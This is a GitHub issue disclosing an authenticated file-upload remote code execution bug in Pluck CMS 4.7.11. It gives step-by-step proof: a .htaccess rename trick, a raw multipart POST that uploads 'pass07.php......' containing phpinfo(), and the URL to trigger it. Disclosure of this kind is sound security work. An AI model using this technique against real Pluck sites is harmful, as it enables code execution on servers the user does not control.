Skip to content

Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files #91

Closed
@wooyin

Description

@wooyin

Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files

Proof
step1: login -> pages -> manage files
upload .htaccess file to turn files/.htaccess to .htaccess.txt
图片

step2: throw .htaccess.txt into trash
图片

step3: upload shell code
图片

POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream

<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"

Upload
-----------------------------18467633426500--

图片

step4: view http://127.0.0.1/pluck4711/files/pass07.php
图片

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions